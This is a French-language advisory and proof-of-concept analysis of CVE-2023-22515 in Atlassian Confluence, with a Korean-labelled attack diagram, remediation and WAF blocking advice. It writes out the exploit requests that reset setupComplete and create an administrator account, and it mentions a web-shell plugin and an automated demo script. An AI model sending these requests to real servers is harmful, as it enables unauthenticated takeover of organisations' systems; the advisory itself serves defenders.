
Analyse technique et exploit de preuve de concept pour CVE-2023-22515, une vulnérabilité critique de contrôle d'accès défaillant dans Atlassian Confluence permettant la création non authentifiée de comptes administrateur et un compromis du système.
[!IMPORTANT] Alerte de sécurité urgente : Cette vulnérabilité est une vulnérabilité à risque maximal avec un score CVSS 10.0 (Critique). Si vous utilisez une version affectée, un correctif immédiat est nécessaire.
CVE-2023-22515 est une vulnérabilité critique Broken Access Control découverte dans Atlassian Confluence Data Center et Server. Un attaquant peut manipuler à distance l'état de configuration du serveur sans authentification, créer un compte administrateur et prendre complètement le contrôle du système.
| Élément | Détails |
|---|
| ID de vulnérabilité | CVE-2023-22515 |
| Risque | CRITICAL (CVSS 10.0) |
| Versions concernées | 8.0.0 ~ 8.5.1 (vérifier les versions détaillées) |
| Type d'attaque | Contournement d'authentification et élévation de privilèges |
Cette vulnérabilité est déclenchée par un attaquant qui modifie la valeur bootstrapStatusProvider.applicationConfig.setupComplete en false via le endpoint /server-info.action.
sequenceDiagram
participant Attacker as 😈 공격자
participant Server as 🖥️ Confluence 서버
participant Config as ⚙️ 설정 관리자
Note over Attacker, Server: 1단계: 설정 상태 초기화 공격
Attacker->>Server: GET /server-info.action?setupComplete=false
Server->>Config: 메모리 상의 설정 완료 플래그 해제
Config-->>Server: 상태 변경 완료 (설치 모드로 전환)
Server-->>Attacker: HTTP 200/302 OK
Note over Attacker, Server: 2단계: 관리자 계정 생성
Attacker->>Server: POST /setup/setupadministrator.action<br/>(새로운 관리자 정보 전송)
Server->>Server: 보안 검증 우회 (설치 모드라 허용됨)
Server-->>Attacker: 계정 생성 성공 및 로그인
Note over Attacker, Server: 3단계: 시스템 장악 (RCE)
Attacker->>Server: 악성 플러그인 업로드 (Web Shell)
Server-->>Attacker: 원격 명령 실행 권한 획득[!NOTE] Principe clé : Au lieu de modifier le fichier de configuration permanent (
confluence.cfg.xml), il s'agit de modifier l'état d'exécution en mémoire pour contourner la logique de contrôle d'accès.
Cela est dû à une vulnérabilité de liaison de paramètres dans le framework XWork2 et à l'absence de validation des entrées externes pour l'attribut sensible (setupComplete) dans la classe d'action (ServerInfoAction) de Confluence.
Un attaquant peut neutraliser le serveur avec une simple requête HTTP.
1. Requête de réinitialisation de la configuration :
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com
2. Requête de création d'administrateur :
POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...
Vous pouvez pratiquer la vulnérabilité dans un environnement Docker sécurisé à l'aide du kit de reproduction (cve-2023-22515-repro) fourni avec ce rapport.
Un script de démonstration est inclus pour visualiser le processus de piratage réel dans le terminal.
# 데모 실행 명령어
bash cinematic_pwn.sh
[!TIP] Le script de démonstration automatise l'ensemble du processus : attaque sur le serveur réel (
localhost:8090), création d'un compte administrateur et tentative de connexion.
La solution la plus sûre est de mettre à niveau vers les versions corrigées fournies par Atlassian.
En cas de difficulté à appliquer le correctif, bloquez l'accès aux modèles d'URL suivants sur les équipements de sécurité réseau (WAF, load balancer, etc.).
*/setup/*CVE-2023-22515 est une vulnérabilité critique avec un très faible niveau de difficulté d'attaque qui permet une prise de contrôle complète du système. Les responsables de la sécurité doivent appliquer le correctif immédiatement et surveiller toute intrusion.
Date de rédaction : 2026-01-16 | Auteur : Antigravity Security Analysis Team